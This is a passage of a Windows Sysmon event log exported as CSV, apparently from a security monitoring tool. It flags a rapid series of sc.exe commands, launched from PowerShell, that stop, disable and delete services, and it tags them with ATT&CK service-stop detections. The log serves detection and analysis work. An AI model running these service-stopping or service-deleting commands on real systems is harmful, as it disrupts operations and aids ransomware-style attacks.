{df9fc3d3-b3b3-5ecf-0000-0010d8b72600}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:59.540"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010d8b72600}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.403 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010dbb42600} +ProcessId: 8016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.409183100Z"",""eventRecordID"":""3021"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.403\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010dbb42600}\r\nProcessId: 8016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.403"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010dbb42600}"",""processId"":""8016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.668",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.383 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010a7b32600} +ProcessId: 7368 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
WissssssnHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WissssssnHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.386781500Z"",""eventRecordID"":""3020"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.383\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010a7b32600}\r\nProcessId: 7368\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WissssssnHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.383"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010a7b32600}"",""processId"":""7368"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WissssssnHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.644",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.345 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010ceb12600} +ProcessId: 3828 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.349125100Z"",""eventRecordID"":""3018"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.345\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010ceb12600}\r\nProcessId: 3828\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.345"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010ceb12600}"",""processId"":""3828"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.589",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.258 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c1ae2600} +ProcessId: 7944 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.260763500Z"",""eventRecordID"":""3015"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.258\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c1ae2600}\r\nProcessId: 7944\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.258"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010c1ae2600}"",""processId"":""7944"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.557",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.207 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00100dad2600} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 
Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.226763700Z"",""eventRecordID"":""3013"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.207\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00100dad2600}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.207"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00100dad2600}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.142 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001007ac2600} +ProcessId: 7872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.145011700Z"",""eventRecordID"":""3012"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.142\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001007ac2600}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: 